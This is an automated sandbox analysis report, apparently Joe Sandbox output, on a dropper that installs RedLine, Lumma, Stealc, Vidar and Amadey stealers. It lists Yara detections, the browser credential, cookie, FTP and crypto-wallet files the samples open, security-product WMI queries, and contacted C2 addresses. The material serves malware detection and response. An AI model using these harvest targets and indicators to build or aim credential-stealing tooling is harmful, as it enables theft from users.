Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0025CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_0025CBEA

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Code function: 9_2_00007FF643F7D2C8 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

9_2_00007FF643F7D2C8

Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2668885421.0000000001403000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 3.2.skotes.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 602c785fe5.exe PID: 1660, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 38.0.FBFF.tmp.fcxcx.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000000.2427424681.0000000000E52000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FBFF.tmp.fcxcx.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 0000002D.00000003.2490452576.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: dwVrTdy.exe	String found in binary or memory: https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip?download=1
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q0C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q-cjelfplplebdjjenllpjcblmjkfcffne\|JaxxxLiberty
Source: dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: TelegramBotgramData\Guest\exodus\*
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\walletsLR
Source: dwVrTdy.exe	String found in binary or memory: C:\ProgramData\%s\exodus
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\walletsLR
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q&%localappdata%\Coinomi\Coinomi\walletsLR
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\

Source: Yara match	File source: 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FBFF.tmp.fcxcx.exe PID: 520, type: MEMORYSTR

Remote Access Functionality

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 602c785fe5.exe PID: 1660, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 38.0.FBFF.tmp.fcxcx.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000000.2427424681.0000000000E52000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FBFF.tmp.fcxcx.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 0000002D.00000003.2490452576.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	2 Scheduled Task/Job	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	4 Data from Local System	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	11 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Exploitation for Client Execution	Login Hook	912 Process Injection	41 Obfuscated Files or Information	NTDS	346 System Information Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Scheduled Task/Job	Network Logon Script	2 Scheduled Task/Job	131 Software Packing	LSA Secrets	1 Network Share Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	1 Timestomp	Cached Domain Credentials	1 Query Registry	VNC	GUI Input Capture	114 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	10101 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	471 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Extra Window Memory Injection	/etc/passwd and /etc/shadow	3 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	123 Masquerading	Network Sniffing	1 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	471 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	912 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Files and Directories	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe	100%	Avira	HEUR/AGEN.1320706
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe	100%	Avira	HEUR/AGEN.1306956
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\u1w30Wt[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\AzVRM7c[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[3].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe	100%	Joe Sandbox ML
C:\Program Files\Windows Media Player\graph\graph.exe	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\dll[1]	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\u1w30Wt[1].exe	58%	ReversingLabs	Win64.Trojan.Midie
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\AzVRM7c[1].exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exe	50%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exe	55%	ReversingLabs	Win32.Trojan.CrypterX
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]	75%	ReversingLabs	ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[1].exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[2].exe	66%	ReversingLabs	Win32.Trojan.Lumma
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[3].exe	68%	ReversingLabs	Win32.Trojan.Mikey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\t5abhIx[1].exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\dwVrTdy[1].exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[1].exe	26%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[2].exe	47%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	58%	ReversingLabs	Win64.Trojan.Midie
C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	26%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	47%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exe	50%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1014445001\182555961e.exe	55%	ReversingLabs	Win32.Trojan.CrypterX
C:\Users\user\AppData\Local\Temp\1014446001\799e7330b8.exe	68%	ReversingLabs	Win32.Trojan.Mikey
C:\Users\user\AppData\Local\Temp\3417.tmp.vvv.exe	34%	ReversingLabs	Win64.Ransomware.Zusy
C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Bunifu_UI_v1.5.3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Y-Cleaner.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	29%	ReversingLabs	Win64.Infostealer.ClipBanker
C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.RedLineStealz
C:\Users\user\AppData\Local\Temp\_MEI36402\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI36402\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI36402\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI36402\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI36402\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI36402\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
star-mini.c10r.facebook.com	157.240.196.35	true	false	high
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false	high
chrome.cloudflare-dns.com	162.159.61.3	true	false	high
twitter.com	104.244.42.65	true	false	high
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false	high
services.addons.mozilla.org	151.101.1.91	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
drive.usercontent.google.com	172.217.17.65	true	false	high
fightlsoser.click	172.67.213.48	true	false	high
dyna.wikimedia.org	185.15.58.224	true	false	high
youtube.com	142.250.181.78	true	false	high
youtube-ui.l.google.com	172.217.19.238	true	false	high
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true	false	high
reddit.map.fastly.net	151.101.1.140	true	false	high
ipinfo.io	34.117.59.81	true	false	high
drive.google.com	216.58.208.238	true	false	high
www.google.com	142.250.181.36	true	false	high
api.telegram.org	149.154.167.220	true	false	high
normandy-cdn.services.mozilla.com	35.201.103.21	true	false	high
www.reddit.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
support.mozilla.org	unknown	unknown	false	high
www.youtube.com	unknown	unknown	false	high
www.facebook.com	unknown	unknown	false	high
detectportal.firefox.com	unknown	unknown	false	high
normandy.cdn.mozilla.net	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
www.wikipedia.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/	true
http://185.215.113.206/68b591d6548ec281/nss3.dll	true
http://80.82.65.70/dll/download	false

URLs from Memory and Binaries

Name	Source	Malicious
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttp://www.inbox.l	firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	false
https://ipinfo.io/missingauth	dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B70000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2184758872.000001CDE3440000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id23ResponseD	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	false
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2204496366.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp	false
https://merino.services.mozilla.com/api/v1/suggest	firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id2Response	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false
https://ipinfo.io/jsonN/Aipcountry	dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp	false
http://tempuri.org/Entity/Id21Response	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	F0A3.tmp.ctx.exe, 00000027.00000002.2444899117.0000024335645000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2438058600.0000024335600000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2444169590.0000024335601000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437592905.0000024335642000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
https://screenshots.firefox.comchrome://browser/skin/menu.svgFailed	firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
